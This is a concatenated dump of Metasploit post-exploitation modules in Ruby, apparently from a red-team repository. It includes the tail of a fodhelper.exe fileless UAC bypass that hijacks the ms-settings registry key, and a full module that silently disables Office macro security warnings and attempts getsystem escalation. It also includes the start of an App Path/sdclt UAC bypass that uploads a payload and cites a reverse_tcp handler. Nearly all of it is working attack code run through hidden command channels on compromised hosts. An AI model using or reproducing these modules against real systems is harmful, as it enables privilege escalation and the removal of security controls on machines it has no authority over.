224 | comm_defa = "#{hij_value}"
225 | comm_inje = "#{regi_hive} /ve /t REG_SZ /d \"#{exec_comm}\" /f"
226 | print_good(" exec => Creating registry cmd command data ..")
227 | print_good(" data: #{hij_value}")
228 | print_good(" data: #{regi_hive} /ve /t REG_SZ /d \"#{exec_comm}\" /f")
229 | Rex::sleep(1.0)
230 |
231 |
232 | # Execute process hijacking in registry
233 | # REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /ve /t REG_SZ /d "cmd.exe /c start notepad.exe" /f
234 | print_good(" exec => Hijacking registry to gain code execution ..")
235 | r = session.sys.process.execute("cmd.exe /c #{comm_defa}", nil, {'Hidden' => true, 'Channelized' => true})
236 | r = session.sys.process.execute("cmd.exe /c #{comm_inje}", nil, {'Hidden' => true, 'Channelized' => true})
237 | # give a proper time to refresh regedit 'enigma0x3' :D
238 | Rex::sleep(4.0)
239 |
240 | #
241 | # start remote service to gain code execution
242 | #
243 | print_good(" exec => Starting #{vul_serve} native process ..")
244 | r = session.sys.process.execute("cmd.exe /c start #{vul_serve}", nil, {'Hidden' => true, 'Channelized' => true})
245 | Rex::sleep(1.0)
246 |
247 | #
248 | # close channel when done ..
249 | #
250 | print_status("Credits: enigma0x3 + @mattifestation + winscriptingblog")
251 | print_line("")
252 | r.channel.close
253 | r.close
254 |
255 | # error exception funtion
256 | rescue ::Exception => e
257 | print_error("Error: #{e.class} #{e}")
258 | end
259 |
260 |
261 |
262 |
263 | #
264 | # DELETE MALICIOUS REGISTRY ENTRY (process hijacking)
265 | #
266 | def ls_stage2
267 |
268 | r=''
269 | session = client
270 | vul_serve = "fodhelper.exe" # vulnerable soft to be hijacked
271 | # vul_value = "DelegateExecute" # vulnerable reg value to create
272 | chec_hive = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command" # registry hive key to be hijacked
273 | reg_clean = "REG DELETE HKCU\\Software\\Classes\\ms-settings /f" # registry hive to be clean
274 | #
275 | # check for proper config settings enter
276 | # to prevent 'unset all' from deleting default options ..
277 | #
278 | if datastore['DEL_REGKEY'] == 'nil'
279 | print_error("Options not configurated correctly ..")
280 | print_warning("Please set DEL_REGKEY option!")
281 | return nil
282 | else
283 | print_status("Revert #{vul_serve} process hijack!")
284 | Rex::sleep(1.5)
285 | end
286 |
287 | #
288 | # Search in target regedit if hijacking method allready exists
289 | #
290 | print_warning("Reading process registry hive keys ..")
291 | Rex::sleep(1.0)
292 | if registry_enumkeys("HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command")
293 | print_good(" exec => Remote registry hive key found!")
294 | Rex::sleep(1.0)
295 | else
296 | # registry hive key not found, aborting module execution.
297 | print_warning("Hive key: HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command")
298 | print_error("[ABORT]: module cant find the registry hive key needed ..")
299 | print_line("")
300 | Rex::sleep(1.0)
301 | return nil
302 | end
303 |
304 | #
305 | # Delete hijacking hive keys from target regedit ..
306 | # REG DELETE HKCU\\Software\\Classes\\ms-settings /f
307 | #
308 | print_good(" exec => Deleting HKCU hive registry keys ..")
309 | print_good(" exec => cmd.exe /c #{reg_clean}")
310 | r = session.sys.process.execute("cmd.exe /c #{reg_clean}", nil, {'Hidden' => true, 'Channelized' => true})
311 | # give a proper time to refresh regedit
312 | Rex::sleep(3.0)
313 |
314 | #
315 | # check if remote registry hijack key was deleted successefuly
316 | #
317 | if registry_enumkeys("HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command")
318 | print_warning("Module can not verify if deletion has successefully!")
319 | else
320 | print_status("Registry hive keys deleted successefuly!")
321 | end
322 |
323 | #
324 | # close channel when done ..
325 | #
326 | Rex::sleep(1.0)
327 | print_status("process hijack reverted to default stage!")
328 | print_line("")
329 | r.channel.close
330 | r.close
331 |
332 | # error exception funtion
333 | rescue ::Exception => e
334 | print_error("Error: #{e.class} #{e}")
335 | end
336 |
337 |
338 |
339 |
340 | #
341 | # CHECK TARGET VULNERABILITY STATUS/EXISTANCE
342 | #
343 | def ls_stage3
344 |
345 | r=''
346 | session = client
347 | oscheck = client.fs.file.expand_path("%OS%")
348 | vuln_soft = "fodhelper.exe" # vulnerable soft to be hijacked
349 | uac_level = "ConsentPromptBehaviorAdmin" # uac level key
350 | vuln_key = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command" # vuln hijack key
351 | uac_hivek = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" # uac hive key
352 | #
353 | # check for proper config settings enter
354 | # to prevent 'unset all' from deleting default options ..
355 | #
356 | if datastore['CHECK_VULN'] == 'nil'
357 | print_error("Options not configurated correctly ..")
358 | print_warning("Please set CHECK_VULN option!")
359 | return nil
360 | else
361 | print_status("Checking target vulnerability details!")
362 | Rex::sleep(1.5)
363 | end
364 |
365 | #
366 | # check target registry hive/key settings (hijacking hive/key)
367 | #
368 | print_warning("Reading process registry hive keys ..")
369 | Rex::sleep(1.0)
370 | if registry_enumkeys("HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command")
371 | vuln_stats = "#{vuln_key}"
372 | report_tw = "UAC BYPASS ACTIVE (ms-settings)"
373 | elsif registry_enumkeys("HKCU\\Software\\Classes")
374 | vuln_stats = "HKCU\\Software\\Classes"
375 | report_tw = "POSSIBLE VULNERABLE (hive found)"
376 | else
377 | vuln_stats = "HKCU\\Software\\Classes"
378 | report_tw = "NOT VULNERABLE (hive not found)"
379 | end
380 |
381 | #
382 | # check target registry hive/key settings (UAC level settings)
383 | #
384 | check_uac = registry_getvaldata("#{uac_hivek}","#{uac_level}")
385 | # a dword:2 value it means 'always notify' setting is active.
386 | if check_uac == 2
387 | report_level = "ALWAYS NOTIFY (NOT EXPLOITABLE)"
388 | # a dword:nil value it means that we are running againts a 'non-uac-system'
389 | elsif check_uac.nil?
390 | report_level = "DWORD DATA EMPTY (NON-UAC-SYSTEM?)"
391 | else
392 | # all good in UAC settings :D
393 | report_level = "#{check_uac} (EXPLOITABLE)"
394 | end
395 |
396 | # obsolect 'def run' allready checks for OS compatiblity.
397 | if oscheck.nil?
398 | oscheck = "NOT COMPATIBLE SYSTEM"
399 | end
400 |
401 | #
402 | # display target registry settings to user ..
403 | # i hope you are smart enouth to recognise a vulnerable output :D
404 | #
405 | print_line("")
406 | print_line("VULNERABLE_SOFT : #{vuln_soft}")
407 | print_line(" TARGET_OS : #{oscheck}")
408 | print_line(" UAC_LEVEL : #{report_level}")
409 | print_line("")
410 | print_line(" HIJACK_HIVE : #{vuln_stats}")
411 | print_line(" VULN_STATUS : #{report_tw}")
412 | print_line("")
413 | print_line("")
414 | Rex::sleep(1.0)
415 |
416 | #
417 | # Report that vuln its allready active ..
418 | #
419 | if report_tw == "UAC BYPASS ACTIVE (ms-settings)"
420 | print_line("Module reports that UAC bypass its allready in use ..")
421 | print_line("Execute in target cmd: start #{vuln_soft}")
422 | end
423 | end
424 |
425 |
426 |
427 |
428 | #
429 | # MAIN DISPLAY WINDOWS (ALL MODULES - def run)
430 | # Running sellected modules against session target
431 | #
432 | def run
433 | session = client
434 |
435 | # Variable declarations (msf API calls)
436 | oscheck = client.fs.file.expand_path("%OS%")
437 | sysnfo = session.sys.config.sysinfo
438 | runtor = client.sys.config.getuid
439 | runsession = client.session_host
440 | directory = client.fs.dir.pwd
441 |
442 |
443 | # Print banner and scan results on screen
444 | print_line(" +----------------------------------------------+")
445 | print_line(" | enigma fileless UAC bypass 'fodhelper.exe' |")
446 | print_line(" | Author : r00t-3xp10it |")
447 | print_line(" +----------------------------------------------+")
448 | print_line("")
449 | print_line(" Running on session : #{datastore['SESSION']}")
450 | print_line(" Computer : #{sysnfo['Computer']}")
451 | print_line(" Operative System : #{sysnfo['OS']}")
452 | print_line(" Target IP addr : #{runsession}")
453 | print_line(" Payload directory : #{directory}")
454 | print_line(" Client UID : #{runtor}")
455 | print_line("")
456 | print_line("")
457 |
458 |
459 | #
460 | # the 'def check()' funtion that rapid7 requires to accept new modules.
461 | # Guidelines for Accepting Modules and Enhancements:https://goo.gl/OQ6HEE
462 | #
463 | # check for proper operative system (windows-not-wine)
464 | if not oscheck == "Windows_NT"
465 | print_error("[ ABORT ]: This module only works againts windows systems")
466 | return nil
467 | end
468 | #
469 | # check for proper operative system (windows 10)
470 | #
471 | if not sysinfo['OS'] =~ /Windows 10/
472 | print_error("[ ABORT ]: This module only works againt windows 10 systems")
473 | return nil
474 | end
475 | #
476 | # check for proper session (meterpreter) the non-return of sysinfo command
477 | # reveals that we are not on a meterpreter session!
478 | #
479 | if not sysinfo.nil?
480 | print_status("Running module against: #{sysnfo['Computer']}")
481 | else
482 | print_error("[ ABORT ]: This module only works in meterpreter sessions!")
483 | return nil
484 | end
485 | #
486 | # elevate session privileges befor runing options
487 | #
488 | client.sys.config.getprivs.each do |priv|
489 | end
490 |
491 |
492 | #
493 | # Selected settings to run
494 | #
495 | if datastore['EXEC_COMMAND']
496 | ls_stage1
497 | end
498 |
499 | if datastore['DEL_REGKEY']
500 | ls_stage2
501 | end
502 |
503 | if datastore['CHECK_VULN']
504 | ls_stage3
505 | end
506 | end
507 | end
508 |
--------------------------------------------------------------------------------
/windows/auxiliarys/bypass_macro_sandbox.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This file is part of the Metasploit Framework and may be subject to
3 | # redistribution and commercial restrictions. Please see the Metasploit
4 | # Framework web site for more information on licensing and terms of use.
5 | # http://metasploit.com/framework/
6 | ##
7 |
8 |
9 | ##
10 | # Bypass macro security warning sandbox (registry).
11 | # $Id$ 1.6 Author: r00t-3xp10it | SSA RedTeam @2016
12 | # 'next time target machine reboot it will let us run office macros without prompt the security warning sandbox!
13 | # Credits: https://blogs.technet.microsoft.com/diana_tudor/2014/12/02/microsoft-project-how-to-control-macro-settings-using-registry-keys/
14 | #
15 | #
16 | # [ POST-EXPLOITATION MODULE DESCRIPTION ]
17 | # This post-module controls macro security warning sandbox settings using registry keys 'VBAWarnings'
18 | # and 'AccessVBOM' that changes the security level for Word/Excel macro down to 'Enable all macros'.
19 | # Also advanced 'DWORD' option allow us to set macro security levels from dword:2 until dword:4
20 | # Vulnerable softwares are => Microsoft Office Word/Excel versions from 10.0 >= 16.0
21 | #
22 | #
23 | # [ POST MODULE OPTIONS ]
24 | # The session number to run this module on => set SESSION 1
25 | # Elevate session to 'nt authority/system' => set GET_SYSTEM true
26 | # change 'VBSWarnings' to dword:1 (bypass) => set MACRO_BYPASS true
27 | # Revert 'VBSWarnings' to dword:2 (default) => set REVERT_BYPASS true
28 | # Chose to exploit Word or Excel software => set EXPLOIT Excel
29 | # Select macro security level (default:2) => set DWORD 4
30 | # ---
31 | # dword:1 Enable All Macros
32 | # dword:2 Disable All macros with notification
33 | # dword:3 Disable all macros except those digitally signed
34 | # dword:4 Disable all without notification
35 | # ---
36 | #
37 | #
38 | # [ PORT MODULE TO METASPLOIT DATABASE ]
39 | # Kali linux COPY TO: /usr/share/metasploit-framework/modules/post/windows/escalate/bypass_macro_sandbox.rb
40 | # Ubuntu linux COPY TO: /opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/bypass_macro_sandbox.rb
41 | # Manually Path Search: root@kali:~# locate modules/post/windows/escalate
42 | #
43 | #
44 | # [ LOAD/USE AUXILIARY ]
45 | # meterpreter > background
46 | # msf exploit(handler) > reload_all
47 | # msf exploit(handler) > use post/windows/escalate/bypass_macro_sandbox
48 | # msf post(bypass_macro_sandbox) > info
49 | # msf post(bypass_macro_sandbox) > show options
50 | # msf post(bypass_macro_sandbox) > show advanced options
51 | # msf post(bypass_macro_sandbox) > set [option(s)]
52 | # msf post(bypass_macro_sandbox) > exploit
53 | ##
54 |
55 |
56 |
57 |
58 |
59 |
60 | # -----------------------------------
61 | # Module Dependencies
62 | # -----------------------------------
63 | require 'rex'
64 | require 'msf/core'
65 | require 'msf/core/post/common'
66 | require 'msf/core/post/windows/priv'
67 | require 'msf/core/post/windows/registry'
68 |
69 |
70 |
71 | # -------------------------------------
72 | # Metasploit Class name and libs
73 | # -------------------------------------
74 | class MetasploitModule < Msf::Post
75 | Rank = ExcellentRanking
76 |
77 | include Msf::Post::Common
78 | include Msf::Post::Windows::Priv
79 | include Msf::Post::Windows::Registry
80 |
81 |
82 |
83 |
84 | # -----------------------------------------
85 | # Building Metasploit/Armitage info GUI/CLI
86 | # -----------------------------------------
87 | def initialize(info={})
88 | super(update_info(info,
89 | 'Name' => 'Bypass macro security warning sandbox',
90 | 'Description' => %q{
91 |
92 | This post-module controls macro security warning sandbox settings using registry keys 'VBAWarnings' and 'AccessVBOM' that changes the security level for Word/Excel macro down to 'Enable all macros'. Also advanced 'DWORD' option allow us to set macro security levels from dword:2 until dword:4, Vulnerable softwares are => Microsoft Office Word/Excel versions from 10.0 >= 16.0
93 |
94 | },
95 | 'License' => UNKNOWN_LICENSE,
96 | 'Author' =>
97 | [
98 | 'peterubuntu10[at]sourceforge[dot]net', # post-module author
99 | 'inspiration: Filipe [ Excel Class ]', # inspiration
100 | 'Special thanks: milton_barra' # debugging module
101 | ],
102 |
103 | 'Version' => '$Revision: 1.6',
104 | 'DisclosureDate' => 'ago 30 2016',
105 | 'Platform' => 'windows',
106 | 'Arch' => 'x86_x64',
107 | 'Privileged' => 'false',
108 | 'Targets' =>
109 | [
110 | # Tested againts Windows 10 | windows 7 (SP1) | windows XP (SP3)
111 | [ 'Windows XP', 'Windows VISTA', 'Windows 7', 'Windows 8', 'Windows 9', 'Windows 10' ]
112 | ],
113 | 'DefaultTarget' => '6', # default its to run againts Windows 10
114 | 'References' =>
115 | [
116 | [ 'URL', 'goo.gl/ALBY2M' ],
117 | [ 'URL', 'http://sourceforge.net/users/peterubuntu10' ],
118 | [ 'URL', 'https://www.howto-outlook.com/howto/selfcert.htm' ],
119 | [ 'URL', 'http://powerspreadsheets.com/how-to-enable-macros-excel/' ],
120 | [ 'URL', 'https://ittechlog.wordpress.com/2013/02/21/disabling-the-office-2010-security-misery' ]
121 | ],
122 | 'DefaultOptions' =>
123 | {
124 | 'SESSION' => '1', # Default its to run againts session 1
125 | 'DWORD' => '2', # macro security default settings (2 => Disable All macros with notification)
126 | 'EXPLOIT' => 'Word', # default its to run againts Word software (or Excel)
127 | },
128 | 'SessionTypes' => [ 'meterpreter' ]
129 |
130 | ))
131 |
132 | register_options(
133 | [
134 | OptString.new('SESSION', [ true, 'The session number to run this module on']),
135 | OptBool.new('GET_SYSTEM', [ false, 'Elevate current session to nt authority/system' , false]),
136 | OptBool.new('MACRO_BYPASS', [ false, 'Bypass macro security warning sandbox (regedit)' , false])
137 | ], self.class)
138 |
139 | register_advanced_options(
140 | [
141 | OptString.new('EXPLOIT', [ false, 'Chose to exploit Word or Excel software']),
142 | OptString.new('DWORD', [ false, 'select macro security level (from dword:2 to dword:4)']),
143 | OptBool.new('REVERT_BYPASS', [ false, 'Revert macro security warning sandbox bypass' , false])
144 | ], self.class)
145 |
146 | end
147 |
148 |
149 |
150 |
151 | # ----------------------------------------------
152 | # Check for proper target Platform (win32|win64)
153 | # ----------------------------------------------
154 | def unsupported
155 | sys = session.sys.config.sysinfo
156 | print_error("Operative System: #{sys['OS']}")
157 | print_error("This auxiliary only works against windows systems!")
158 | print_warning("Please execute [info] for further information...")
159 | print_line("")
160 | raise Rex::Scrip::Completed
161 | end
162 |
163 |
164 |
165 |
166 | # ----------------------------------------
167 | # 'Privilege escalation' - Getting @SYSTEM
168 | # ----------------------------------------
169 | def priv_escal
170 |
171 | toor = []
172 | # variable API declarations
173 | toor = client.sys.config.getuid
174 | print_warning("Client UID: #{toor}")
175 | print_status("Escalate client session to: nt authority/system")
176 |
177 | # getprivs API call loop funtion
178 | client.sys.config.getprivs.each do |priv|
179 | print_good(" Impersonate token => #{priv}")
180 | end
181 |
182 | # checking results (if_system)
183 | result = client.priv.getsystem
184 | if result and result[0]
185 |
186 | csuid = []
187 | csuid = client.sys.config.getuid
188 | # print results on screen if successefully executed
189 | print_status("Current client UID: #{csuid}")
190 | print_line("")
191 |
192 | else
193 | # error display in executing command
194 | print_error("Fail to obtain [nt authority/system] access!")
195 | print_warning("Please manually run: getsystem to gain system privs!")
196 | print_line("")
197 | end
198 | end
199 |
200 |
201 |
202 |
203 | # ---------------------------------------------------
204 | # 1 - find Microsoft Office version number Installed
205 | # 2 - Add [bypass] registry key 'VBAWarnings' (dword:1)
206 | # 3 - Add [bypass] registry key 'AccessVBOM' (dword:1)
207 | # ---------------------------------------------------
208 | def bypass_exploit
209 |
210 | r=''
211 | key=''
212 | path = []
213 | version = []
214 | # variable declarations
215 | key = "VBAWarnings"
216 | software = datastore['EXPLOIT']
217 | path = "HKCU\\Software\\Microsoft\\Office\\"
218 | print_status("Bypass Office macro sandbox security warnings!")
219 | print_status("Checking Microsoft Office version installed...")
220 |
221 | # determine office version number Installed
222 | # and set dword key name (depending of version)
223 | if registry_enumkeys("HKCU\\Software\\Microsoft\\Office\\10.0")
224 | version = "10.0"
225 | key = "Level"
226 | elsif registry_enumkeys("HKCU\\Software\\Microsoft\\Office\\11.0")
227 | version = "11.0"
228 | key = "Level" # All versions < 12.0 uses 'Level' dword key name
229 | elsif registry_enumkeys("HKCU\\Software\\Microsoft\\Office\\12.0")
230 | version = "12.0"
231 | elsif registry_enumkeys("HKCU\\Software\\Microsoft\\Office\\13.0")
232 | version = "13.0"
233 | elsif registry_enumkeys("HKCU\\Software\\Microsoft\\Office\\14.0")
234 | version = "14.0"
235 | elsif registry_enumkeys("HKCU\\Software\\Microsoft\\Office\\15.0")
236 | version = "15.0"
237 | elsif registry_enumkeys("HKCU\\Software\\Microsoft\\Office\\16.0")
238 | version = "16.0"
239 | else
240 | print_error("Microsoft Office version: [ NOT ] found.. Aborting tasks...")
241 | print_warning("Please check: [ #{path} ] to determine version installed...")
242 | print_line("")
243 | return
244 | end
245 |
246 | print_warning(" Microsoft Office version detected => #{version}")
247 | # Bypass macro sandbox security warning using regedit [ dword:1 Enable All Macros ] ...
248 | # Raw Key: "HKCU\Software\Microsoft\Office\16.0\Excel\security /v VBAWarnings /t REG_DWORD /d 1 /f"
249 | bypass="HKCU\\Software\\Microsoft\\Office\\#{version}\\#{software}\\Security /v #{key} /t REG_DWORD /d 1 /f"
250 | access="HKCU\\Software\\Microsoft\\Office\\#{version}\\#{software}\\Security /v AccessVBOM /t REG_DWORD /d 1 /f"
251 | refres="RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True" # This key will refresh target system
252 |
253 | # execute cmd prompt in a hidden channelized windows to manipulate regedit using native cmd...
254 | r = session.sys.process.execute("cmd.exe /c REG ADD #{bypass}", nil, {'Hidden' => true, 'Channelized' => true})
255 | r = session.sys.process.execute("cmd.exe /c REG ADD #{access}", nil, {'Hidden' => true, 'Channelized' => true})
256 | r = session.sys.process.execute("cmd.exe /c REG ADD #{refres}", nil, {'Hidden' => true, 'Channelized' => true})
257 | print_good(" exec => #{bypass}")
258 | print_good(" exec => #{access}")
259 | print_good(" exec => #{refres}")
260 |
261 | # close client channel
262 | r.channel.close
263 | r.close
264 |
265 |
266 | # - EXPLOIT REPORT -
267 | # funtion to check if the rigth key data as injected...
268 | check_success = registry_getvaldata("HKCU\\Software\\Microsoft\\Office\\#{version}\\#{software}\\Security","#{key}")
269 | if check_success == 1
270 | print_status("[REMARK]: next REBOOT will let us run macros WITHOUT security warnings...")
271 | print_line(" _")
272 | print_line(" | Software : #{software} (#{version})")
273 | print_line(" | Keys : #{key} (dword:#{check_success}) | AccessVBOM (dword:1)")
274 | print_line(" |_Description : Enable All Macros.")
275 | print_line("")
276 | else
277 | print_error("[ERROR]: function cant verify registry key Injection...")
278 | print_error("[POSSIBLE CAUSES]: session its not elevated to SYSTEM privileges ?")
279 | print_warning("Please manually check: HKCU\\Software\\Microsoft\\Office\\#{version}\\#{software}\\Security - #{key}")
280 | print_line("")
281 | return
282 | end
283 | end
284 |
285 |
286 |
287 |
288 | # ---------------------------------------------------------------------
289 | # 1 - find Microsoft Office version number Installed...
290 | # 2 - revert [bypass] registry key 'VBAwarnings'(dword:2) <-- default
291 | # 3 - Add [bypass] registry key 'AccessVBOM' (dword:0) <-- default
292 | # "THIS FUNTION ALSO GIVE US THE ABILITY TO SET A DIFERENT DWORD VALUE"
293 | # ---------------------------------------------------------------------
294 | def revert_bypass
295 |
296 | r=''
297 | key=''
298 | path = []
299 | version = []
300 | # variable declarations
301 | key = "VBAWarnings"
302 | value = datastore['DWORD']
303 | software = datastore['EXPLOIT']
304 | path = "HKCU\\Software\\Microsoft\\Office\\"
305 | print_status("Revert Office macro security level to dword:#{value}")
306 | print_status("Checking Microsoft Office version installed...")
307 |
308 | # determine office version number Installed
309 | # and set dword key name (depending of version)
310 | if registry_enumkeys("HKCU\\Software\\Microsoft\\Office\\10.0")
311 | version = "10.0"
312 | key = "Level"
313 | elsif registry_enumkeys("HKCU\\Software\\Microsoft\\Office\\11.0")
314 | version = "11.0"
315 | key = "Level" # All versions < 12.0 uses 'Level' dword key name
316 | elsif registry_enumkeys("HKCU\\Software\\Microsoft\\Office\\12.0")
317 | version = "12.0"
318 | elsif registry_enumkeys("HKCU\\Software\\Microsoft\\Office\\13.0")
319 | version = "13.0"
320 | elsif registry_enumkeys("HKCU\\Software\\Microsoft\\Office\\14.0")
321 | version = "14.0"
322 | elsif registry_enumkeys("HKCU\\Software\\Microsoft\\Office\\15.0")
323 | version = "15.0"
324 | elsif registry_enumkeys("HKCU\\Software\\Microsoft\\Office\\16.0")
325 | version = "16.0"
326 | else
327 | print_error("Microsoft Office version: [ NOT ] found.. Aborting tasks...")
328 | print_warning("Please check: [ #{path} ] to determine the version installed...")
329 | print_line("")
330 | return
331 | end
332 |
333 | # display detailed description of dword value sellected to inject...
334 | # and at the same time restrict the use of dword:0 or dword:1...
335 | if datastore['DWORD'] == 0 || datastore['DWORD'] == 1
336 | print_error("This function does not support [ dword: #{value} ]")
337 | print_warning("please set DWORD to [ 2 | 3 | 4 ] run levels...")
338 | print_line("")
339 | return
340 | elsif datastore['DWORD'] == 2
341 | lvl = "Disable All macros with notification."
342 | elsif datastore['DWORD'] == 3
343 | lvl = "Disable all macros except those digitally signed."
344 | elsif datastore['DWORD'] == 4
345 | lvl = "Disable all without notification."
346 | else
347 | print_error("This function does not support [ dword: #{value} ]")
348 | print_warning("please set DWORD to [ 2 | 3 | 4 ] run levels...")
349 | print_line("")
350 | return
351 | end
352 |
353 | # Revert macro sandbox security warning using regedit...
354 | print_warning(" Microsoft Office version detected => #{version}")
355 | # Raw Key: "HKCU\Software\Microsoft\Office\11.0\Word\Security /v Level /t REG_DWORD /d 2 /f"
356 | revert="HKCU\\Software\\Microsoft\\Office\\#{version}\\#{software}\\Security /v #{key} /t REG_DWORD /d #{value} /f"
357 | access="HKCU\\Software\\Microsoft\\Office\\#{version}\\#{software}\\Security /v AccessVBOM /t REG_DWORD /d 0 /f"
358 | refres="RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True" # This key will refresh target system
359 |
360 | # execute cmd prompt in a hidden channelized windows to manipulate regedit using native cmd...
361 | r = session.sys.process.execute("cmd.exe /c REG ADD #{revert}", nil, {'Hidden' => true, 'Channelized' => true})
362 | r = session.sys.process.execute("cmd.exe /c REG ADD #{access}", nil, {'Hidden' => true, 'Channelized' => true})
363 | r = session.sys.process.execute("cmd.exe /c REG ADD #{refres}", nil, {'Hidden' => true, 'Channelized' => true})
364 | print_good(" exec => #{revert}")
365 | print_good(" exec => #{access}")
366 | print_good(" exec => #{refres}")
367 |
368 | # close client channel
369 | r.channel.close
370 | r.close
371 |
372 | # - EXPLOIT REPORT -
373 | # funtion to check if the rigth key data as injected...
374 | check_success = registry_getvaldata("HKCU\\Software\\Microsoft\\Office\\#{version}\\#{software}\\Security","#{key}")
375 | if check_success == 2 || check_success == 3 || check_success == 4
376 | print_status("[REMARK]: Microsoft Office macro auto-execution: Disabled...")
377 | print_line(" _")
378 | print_line(" | Software : #{software} (#{version})")
379 | print_line(" | Keys : #{key} (dword:#{check_success}) | AccessVBOM (dword:0)")
380 | print_line(" |_Description : #{lvl}")
381 | print_line("")
382 | else
383 | print_error("[ERROR]: function cant verify registry key Injection...")
384 | print_error("[POSSIBLE CAUSES]: session its not elevated to SYSTEM privileges ?")
385 | print_warning("Please manually check: HKCU\\Software\\Microsoft\\Office\\#{version}\\#{software}\\Security - #{key}")
386 | print_line("")
387 | return
388 | end
389 | end
390 |
391 |
392 |
393 |
394 |
395 | # ------------------------------------------------
396 | # MAIN DISPLAY WINDOWS (ALL MODULES - def run)
397 | # ------------------------------------------------
398 | def run
399 |
400 | session = client
401 | # Check for proper target Platform
402 | unsupported if client.platform !~ /win32|win64/i
403 |
404 | # Variable declarations (msf API calls)
405 | sysnfo = session.sys.config.sysinfo
406 | runtor = client.sys.config.getuid
407 | runsession = client.session_host
408 | directory = client.fs.dir.pwd
409 |
410 | # Print banner and scan results on screen
411 | print_line(" +-----------------------------------------+")
412 | print_line(" | * macro warning sandbox bypass * |")
413 | print_line(" | Author: Pedro Ubuntu [ r00t-3xp10it ] |")
414 | print_line(" +-----------------------------------------+")
415 | print_line("")
416 | print_line(" Running on session : #{datastore['SESSION']}")
417 | print_line(" Computer : #{sysnfo['Computer']}")
418 | print_line(" Operative System : #{sysnfo['OS']}")
419 | print_line(" Target IP addr : #{runsession}")
420 | print_line(" Payload directory : #{directory}")
421 | print_line(" Client UID : #{runtor}")
422 | print_line("")
423 | print_line("")
424 |
425 |
426 | # check for proper session.
427 | if not sysinfo.nil?
428 | print_status("Running module against: #{sysnfo['Computer']}")
429 | else
430 | print_error("ABORT]:This post-module only works in meterpreter sessions")
431 | raise Rex::Script::Completed
432 | end
433 |
434 |
435 | # ------------------------
436 | # Selected settings to run
437 | # ------------------------
438 | if datastore['GET_SYSTEM']
439 | priv_escal
440 | end
441 |
442 | if datastore['MACRO_BYPASS']
443 | bypass_exploit
444 | end
445 |
446 | if datastore['REVERT_BYPASS']
447 | revert_bypass
448 | end
449 | end
450 | end
451 |
--------------------------------------------------------------------------------
/windows/local-privilege-escalation/enigma_AppPath_bypass.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This file is part of the Metasploit Framework and may be subject to
3 | # redistribution and commercial restrictions. Please see the Metasploit
4 | # Framework web site for more information on licensing and terms of use.
5 | # http://metasploit.com/framework/
6 | ##
7 |
8 |
9 | ##
10 | # Exploit Title : enigma_AppPath_bypass.rb
11 | # Module Author : pedr0 Ubuntu [r00t-3xp10it]
12 | # Vuln discover : enigma0x3 | @mattifestation
13 | # Works againts : Windows 10
14 | # POC: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths
15 | #
16 | #
17 | #
18 | # [ DESCRIPTION ]
19 | # "Bypasses UAC by abusing the App Path registry key for control.exe"
20 | # This post-module will use an alternative method that also doesn’t rely on the
21 | # IFileOperation/DLL hijacking approach. This technique works on Windows 10 build 15031.
22 | # This module will upload your payload.exe, create the required registry entry in the current
23 | # user’s hive and runs sdclt.exe (hijacking the process being started to gain code execution).
24 | # "The 2º session will be executed in an higth-integrity context (allowing privilege escalation)"
25 | #
26 | #
27 | # NOTE:
28 | # Some Microsoft signed binaries auto-elevate themselfs due to their manifest like "sdclt.exe"
29 | # The manifest for sdclt.exe in Windows 7 has the requestedExecutionLevel set to “AsInvoker”,
30 | # preventing auto-elevation when started from medium integrity. Also it is important to note
31 | # that this technique does not allow for parameters (e.g, %windir%\System32\cmd.exe /c calc.exe).
32 | # Meaning it requires your payload to be placed on disk someplace and simple execute it.
33 | # NOTE: "This module will not work if target UAC level its set to 'Always Notify'"
34 | #
35 | #
36 | #
37 | # [ EXPLOITATION ]
38 | # 1º - exploit target system (no need admin privs) and get the session back
39 | # 2º - execute the 2º payload.exe (to be uploaded) comrrespondent handler in background
40 | # msf post(enigma_AppPath_bypass) > handler -p windows/meterpreter/reverse_tcp -H 192.192.1.69 -P 666
41 | # 3º - execute enigma_AppPath_bypass post-module to get the 2º session back
42 | # 4º - now we can elevate privileges in 2º session using getprivs and getsystem
43 | #
44 | #
45 | # [ MODULE OPTIONS ]
46 | # The session number to run this module on => set SESSION 3
47 | # Input the payload name to be uploaded => set PAYLOAD_NAME payload.exe
48 | # The destination path were to deploy payload => set DEPLOY_PATH %temp%
49 | # The full path (local) of payload to be uploaded => set LOCAL_PATH /root/payload.exe
50 | # Check target vulnerability settings/status? => set CHECK_VULN true
51 | # Delete malicious registry hive keys/values? => set DEL_REGKEY true
52 | #
53 | #
54 | # [ PORT MODULE TO METASPLOIT DATABASE ]
55 | # Kali linux COPY TO: /usr/share/metasploit-framework/modules/post/windows/escalate/enigma_AppPath_bypass.rb
56 | # Ubuntu linux COPY TO: /opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/enigma_AppPath_bypass.rb
57 | # Manually Path Search: root@kali:~# locate modules/post/windows/escalate
58 | #
59 | #
60 | # [ LOAD/USE AUXILIARY ]
61 | # meterpreter > background
62 | # msf exploit(handler) > reload_all
63 | # msf exploit(handler) > use post/windows/escalate/enigma_AppPath_bypass
64 | # msf post(enigma_AppPath_bypass) > info
65 | # msf post(enigma_AppPath_bypass) > show options
66 | # msf post(enigma_AppPath_bypass) > show advanced options
67 | # msf post(enigma_AppPath_bypass) > set [option(s)]
68 | # msf post(enigma_AppPath_bypass) > exploit
69 | #
70 | #
71 | # [ HINT ]
72 | # In some linux distributions postgresql needs to be started and
73 | # metasploit database deleted/rebuild to be abble to load module.
74 | # 1 - service postgresql start
75 | # 2 - msfdb reinit (optional)
76 | # 3 - msfconsole -x 'reload_all'
77 | ##
78 |
79 |
80 |
81 |
82 | #
83 | # Module Dependencies/requires
84 | #
85 | require 'rex'
86 | require 'msf/core'
